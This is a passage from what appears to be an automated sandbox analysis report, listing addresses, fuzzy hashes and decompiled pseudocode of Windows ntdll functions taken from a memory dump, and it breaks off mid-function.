0x04aed2b6
0x04aed2bc
0x04aed2bd
0x04aed2be
0x04aed2bf
0x04aed2c2
0x04aed2c4
0x04aed2cc
0x04aed384
0x04aed34b
0x04aed34f
0x04aed350
0x04aed351
0x04aed35c
0x04aed35c
0x04aed2d6
0x04aed2da
0x04aed2e1
0x04aed361
0x04aed369
0x04aed36d
0x04aed2e3
0x04aed2e3
0x04aed2e3
0x04aed2e5
0x04aed2ed
0x04aed2f5
0x04aed2fa
0x04aed302
0x04aed303
0x04aed30b
0x04aed30f
0x04aed313
0x04aed318
0x04aed31c
0x04aed320
0x04aed379
0x04aed37d
0x00000000
0x00000000
0x04b2affe
0x04b2b001
0x04b2b011
0x00000000
0x04aed322
0x04aed322
0x04aed330
0x04aed337
0x04aed35d
0x04aed339
0x04aed33f
0x04aed38c
0x04aed38c
0x04aed33f
0x04aed349
0x00000000
0x04aed349

Strings

@, xrefs: 04AED303

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 3dfec1aff212368496a489d69152259eec4dc4cdd9698b54201598f8d46cd5e6
Instruction ID: d4d33ba991977cb0a3c5ef527a7a2be6b70dd719fbd567d7a8fa1f3720b5a54c
Opcode Fuzzy Hash: 3dfec1aff212368496a489d69152259eec4dc4cdd9698b54201598f8d46cd5e6
Instruction Fuzzy Hash: DC3197B55083069FD321DF29C9809ABBBF8FB85754F40092EF5A593250E738ED04DB92

Uniqueness

Uniqueness Score: -1.00%

Function 04AC1B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E04AC1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E04AFBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E04AFA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E04AFA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L04AD4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x04ac1b8f
0x04ac1b9a
0x04ac1b9c
0x04ac1b9e
0x04ac1ba3
0x04b17010
0x04b17010
0x00000000
0x04ac1ba9
0x04ac1ba9
0x04ac1bae
0x00000000
0x04ac1bc5
0x04ac1bca
0x04ac1bcf
0x04ac1bd0
0x04ac1bd1
0x04ac1bd2
0x04ac1bd6
0x04ac1bdc
0x04ac1be0
0x04b16ffc
0x04b17000
0x00000000
0x04b17006
0x04b17009
0x04b17009
0x04ac1be6
0x04ac1bec
0x04ac1c0b
0x04ac1c0b
0x04ac1c0c
0x04ac1c11
0x04ac1c12
0x04ac1c15
0x04ac1c1b
0x04ac1c1f
0x04ac1c31
0x04ac1c33
0x04b17026
0x04b17026
0x04ac1c21
0x04ac1c24
0x04ac1c24
0x04ac1bee
0x04ac1bee
0x04ac1bf2
0x04ac1c3a
0x04ac1bf4
0x04ac1bf4
0x04ac1c05
0x04ac1c05
0x04ac1c09
0x04ac1c3e
0x00000000
0x00000000
0x00000000
0x04ac1c09
0x04ac1bec
0x04ac1be0
0x04ac1bae
0x04ac1c2e

Strings

WindowsExcludedProcs, xrefs: 04AC1BC5

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 3708f30e8587928bbccb9e4be27b1dfdf802c24c8accc3dfd185ce76d6d54e5d
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 6E21F277704228ABDB61DF99C984FABB7BDEF41B50F054469F9048B211EA34FD019BA0

Uniqueness

Uniqueness Score: -1.00%

Function 04ADF716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04ADF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x04adf71d
0x04adf722
0x04adf726
0x04b24770
0x04adf765
0x04adf769
0x04adf769
0x04adf732
0x04b2477a
0x00000000
0x04b2477a
0x04adf738
0x04adf73a
0x04adf73c
0x04adf73f
0x04adf746
0x04adf778
0x04adf7a9
0x04adf7a9
0x04adf754
0x04adf75a
0x04adf75d
0x04adf75f
0x04adf761
0x04adf76f
0x04adf771
0x04adf771
0x04adf76f
0x04adf763
0x00000000
0x04adf763
0x04adf77d
0x04adf7a3
0x04adf7a5
0x00000000
0x04adf7a5
0x04adf77f
0x04adf782
0x04adf784
0x04adf786
0x00000000
0x00000000
0x00000000
0x04adf788
0x04adf748
0x04adf74d
0x04adf78d
0x04adf793
0x04adf7b7
0x04adf7bc
0x00000000
0x04adf7bc
0x04adf798
0x00000000
0x00000000
0x04adf79d
0x04adf7b0
0x00000000
0x04adf7b0
0x04adf79f
0x00000000
0x04adf74f
0x04adf74f
0x00000000
0x04adf74f

Strings

Actx , xrefs: 04ADF73F

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 5f5be70bcccbaa69a38c807dabdc70fd42477cac6858cf10c2370b0551d874d4
Instruction ID: 0b3b3864129397f45bc6e112e3cf3831daed9aab190f750944597b14758d8761
Opcode Fuzzy Hash: 5f5be70bcccbaa69a38c807dabdc70fd42477cac6858cf10c2370b0551d874d4
Instruction Fuzzy Hash: EB11DDB5B046028FEB244F1CC9907F772A6EB86324F24452AF477CB7A0EA70F8408340

Uniqueness

Uniqueness Score: -1.00%

Function 04B68DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E04B68DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x4b90d50);
				E04B0D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E04B45720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L04B0DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L04B0DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E04B0D130(_t34, _t39, _t40);
			}

0x04b68df1
0x04b68df1
0x04b68df1
0x04b68df1
0x04b68df1
0x04b68df1
0x04b68df3
0x04b68df8
0x04b68dfd
0x04b68e00
0x04b68e0e
0x04b68e2a
0x04b68e36
0x04b68e38
0x04b68e3c
0x04b68e46
0x04b68e46
0x04b68e36
0x04b68e50
0x04b68e56
0x04b68e59
0x04b68e5c
0x04b68e60
0x04b68e67
0x04b68e6d
0x04b68e73
0x04b68e74
0x04b68eb1
0x04b68ebd

Strings

Critical error detected %lx, xrefs: 04B68E21

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 216637a59d77dbfb65b0d2ae8624d3e6ea926d645803642f4f4e7c08b9a04a72
Instruction ID: 9ee1973316542aa2ef35ef265832061f5219424becceea165bd0ec40e01ad39e
Opcode Fuzzy Hash: 216637a59d77dbfb65b0d2ae8624d3e6ea926d645803642f4f4e7c08b9a04a72
Instruction Fuzzy Hash: 65115776D01348EBEF25DFA485057DCBBB4BB04315F2086ADD52A6B2D2D3342601CF14

Uniqueness

Uniqueness Score: -1.00%

Function 04B4FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 04B4FF60

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 621c1931a5fda1c0080b390c6bebb33a6058e2d0b3950843c1b68337fa241b85
Instruction ID: 91571110fe98a09ff1e72af8dfb4d2fb3ddb25078306d2f6d9b1231aa4bd1e3e
Opcode Fuzzy Hash: 621c1931a5fda1c0080b390c6bebb33a6058e2d0b3950843c1b68337fa241b85
Instruction Fuzzy Hash: 1211C471911144EFEF22DF50C949FA87BB1FF48709F1480D4E109672A1C739B950DB60

Uniqueness

Uniqueness Score: -1.00%

Function 04B85BA5, Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E04B85BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x4b91178);
				E04B0D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E04B84C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E04AFD000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E04B85542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x4ba60e8;
								if( *0x4ba60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x4ba60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E04AF9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E04AF6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E04AFF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E04AFF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E04AFF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E04AFFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E04AFFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E04AFF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E04AFF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
